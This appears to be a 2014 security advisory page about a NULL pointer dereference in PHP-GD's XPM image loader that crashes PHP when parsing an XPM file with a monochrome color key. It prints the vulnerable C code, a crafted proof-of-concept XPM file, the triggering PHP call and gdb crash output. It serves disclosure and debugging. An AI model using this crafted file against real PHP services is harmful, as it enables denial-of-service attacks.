PHP-GD <= v5.4.17-2 c_color NULL pointer dereference

2014.03.17
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Description: ------------ php-gd <= v5.4.17-2 'c_color' NULL pointer dereference so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c: --------------------------------------------------------------------------------- gdImagePtr gdImageCreateFromXpm (char *filename) { XpmInfo info; XpmImage image; int i, j, k, number; char buf[5]; gdImagePtr im = 0; int *pointer; int red = 0, green = 0, blue = 0; int *colors; int ret; ret = XpmReadFileToXpmImage(filename, &image, &info); if (ret != XpmSuccess) { return 0; } if (!(im = gdImageCreate(image.width, image.height))) { goto done; } number = image.ncolors; colors = (int *) safe_emalloc(number, sizeof(int), 0); for (i = 0; i < number; i++) { switch (strlen (image.colorTable[i].c_color)) { // BOOM -------------------------------------------------------------------------------------------------------- The call to strlen() parses image.colorTable[i].c_color which is initialised as NULL if the particular color mapping uses a different key (such as monochrome/monovisual). The xpmColorKeys array stores all avaliable keys and can be found in libXpm: ---------------------------------------------------------------------------- const char *xpmColorKeys[] = { "s", /* key #1: symbol */ "m", /* key #2: mono visual */ "g4", /* key #3: 4 grays visual */ "g", /* key #4: gray visual */ "c", /* key #5: color visual */ }; The following xpm file will trigger the bug: -------------------------------------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", --------------------------------------------- POC: php > imagecreatefromxpm("monochome-poc.xpm"); (gdb) p colorTable[0] $2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"} (gdb) p colorTable[1] $3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"} (gdb) p colorTable[2] $4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"} (gdb) p colorTable[3] $5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0} (gdb) p colorTable[4] $6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"} (gdb) p colorTable[5] $7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"} (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 39 movdqu (%rdi), %xmm1 (gdb) bt #0 __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 #1 0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42 #2 0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534 #3 0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643 #4 0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410 #5 0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197 #6 0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664 #7 0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986 #8 0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364 Test script: --------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", Expected result: ---------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Resource id #4 php > Actual result: -------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Segmentation fault (core dumped)

References:

https://bugs.php.net/bug.php?id=66901


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top